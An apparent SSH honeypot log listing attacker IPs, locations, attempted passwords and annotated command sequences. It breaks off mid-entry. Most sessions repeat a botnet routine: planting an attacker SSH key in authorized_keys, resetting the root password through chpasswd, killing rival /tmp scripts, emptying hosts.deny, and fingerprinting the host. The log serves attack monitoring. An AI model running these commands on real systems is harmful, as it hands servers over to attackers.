2026-05-19 18:30 EDT Β· as admin/P@ssword@123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 ghost_root_101 (111.68.98.152) β€” Islamabad, Pakistan Β· 5 sessions Β· 96 cmds
2026-05-04 22:53 EDT Β· as root/fred123, root/kitty, root/monitor123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—5 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—5 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—5 // CPU profiling
$ echo "root:TdIsEvTi1hay"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—4 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—5 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—5
$ ls -lh $(which ls) Γ—5
$ which ls Γ—5
$ crontab -l Γ—5 // persistence setup
$ w Γ—5 // logged-in users check
$ uname -m Γ—5
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—5 // CPU profiling
$ top Γ—5 // process monitoring
$ uname Γ—5 // OS identification
$ uname -a Γ—5 // OS/kernel identification
$ whoami Γ—5 // privilege check
$ lscpu | grep Model Γ—5
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—5
$ echo "root:vp9j54UHm7Wd"|chpasswd|bash
$ echo "root:EEA0KstWY1Jb"|chpasswd|bash
$ echo "root:ok2APCx5a1q4"|chpasswd|bash
$ echo -e "12qwsazx\nKH0Ap20za5UO\nKH0Ap20za5UO"|passwd|bash
$ Enter new UNIX password:
$ echo "12qwsazx\nKH0Ap20za5UO\nKH0Ap20za5UO\n"|passwd
🎭 panda_root_31 (14.103.9.211) β€” Beijing, China Β· 1 session Β· 19 cmds
2026-05-19 18:23 EDT Β· as root/123jenkins
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:DYGElWsg3uVs"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_sol_3 (188.127.161.78) β€” Madrid, Spain Β· 1 session Β· 19 cmds
2026-05-19 18:21 EDT Β· as root/123456root
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:FMjQYM44uH7F"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_86 (151.35.204.114) β€” Capena, Italy Β· 1 session Β· 19 cmds
2026-05-19 18:14 EDT Β· as root/monitor123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:oxyyvlHwiOCV"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cowboy_root_45 (49.51.73.108) β€” Santa Clara, United States Β· 1 session Β· 19 cmds
2026-05-19 18:00 EDT Β· as root/@ppl3s
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:k0fT6tLkLEil"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_root_78 (58.69.56.44) β€” Makati City, Philippines Β· 1 session Β· 19 cmds
2026-05-19 17:59 EDT Β· as root/db1
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:upZS5EM1iSc3"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 monsoon_root_16 (66.116.233.132) β€” Navi Mumbai, India Β· 1 session Β· 1 cmd
2026-05-19 17:25 EDT Β· as admin/p@ssw0rd@2025
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 cowboy_root_15 (72.17.34.38) β€” Winter Park, United States Β· 2 sessions Β· 38 cmds
2026-05-19 17:06 EDT Β· as root/gmodserver4, root/k0nig12*
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:JJgIZbavGOl9"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:kCw2MjG08HnF"|chpasswd|bash
🎭 stein_root_23 (166.1.144.134) β€” Frankfurt am Main, Germany Β· 2 sessions Β· 38 cmds
2026-05-19 17:04 EDT Β· as root/gmodserver4, root/k0nig12*
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:Sa6gXI5VUuVT"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:n9AAt2dWBxkB"|chpasswd|bash
🎭 tiger_root_20 (103.138.237.18) β€” Hyderabad, India Β· 1 session Β· 1 cmd
2026-05-19 17:08 EDT Β· as jimster/admin2026#
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 shadow_root_77 (102.212.246.188) β€” Thika, Kenya Β· 1 session Β· 1 cmd
2026-05-19 16:44 EDT Β· as jimster/admin123#
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 star_root_36 (24.199.119.136) β€” Santa Clara, United States Β· 1 session Β· 1 cmd
2026-05-19 16:42 EDT Β· as jimster/admin2024#
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 chateau_root_15 (109.123.244.82) β€” Lauterbourg, France Β· 1 session Β· 1 cmd
2026-05-19 16:25 EDT Β· as root/password
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 burger_root_47 (50.116.72.139) β€” Houston, United States Β· 2 sessions Β· 38 cmds
2026-05-19 15:59 EDT Β· as root/idc123, root/jack
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:LxasJW7H93ng"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:jBcjWFU9NMPm"|chpasswd|bash
🎭 rogue_root_99 (148.66.132.204) β€” Singapore, Singapore Β· 1 session Β· 19 cmds
2026-05-19 16:03 EDT Β· as root/placrim@1234
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:Pjn9bZmyDKnn"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 samba_root_8 (45.165.14.197) β€” Chapadinha, Brazil Β· 1 session Β· 19 cmds
2026-05-19 15:55 EDT Β· as root/jack
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:WwlXnsRcHUBH"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 spice_root_15 (139.59.5.17) β€” Bengaluru, India Β· 1 session Β· 1 cmd
2026-05-19 15:38 EDT Β· as jimster/Admin@2024
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 burger_root_48 (173.201.36.82) β€” St Louis, United States Β· 1 session Β· 1 cmd
2026-05-19 15:25 EDT Β· as root/Swissmp
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 kimchi_root_13 (115.71.233.62) β€” Seongnam-si, South Korea Β· 1 session Β· 1 cmd
2026-05-19 15:12 EDT Β· as root/1.Jimster
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 specter_root_87 (185.23.70.19) β€” Madrid, Spain Β· 1 session Β· 1 cmd
2026-05-19 14:49 EDT Β· as root/password123!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 silk_root_22 (14.103.46.177) β€” Beijing, China Β· 1 session Β· 19 cmds
2026-05-19 14:45 EDT Β· as root/mycat
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:7gTiUlbf0Lr5"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 chai (122.166.248.155) β€” Bengaluru, India Β· 1 session Β· 1 cmd
2026-05-19 14:38 EDT Β· as shuf/ 'SEX-*': No such file or directory
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 spice_root_16 (43.230.202.134) β€” Panvel, India Β· 1 session Β· 1 cmd
2026-05-19 14:37 EDT Β· as root/Test@1234
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 dragon_root_24 (120.48.42.17) β€” Beijing, China Β· 1 session Β· 19 cmds
2026-05-19 14:30 EDT Β· as root/admin1111
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
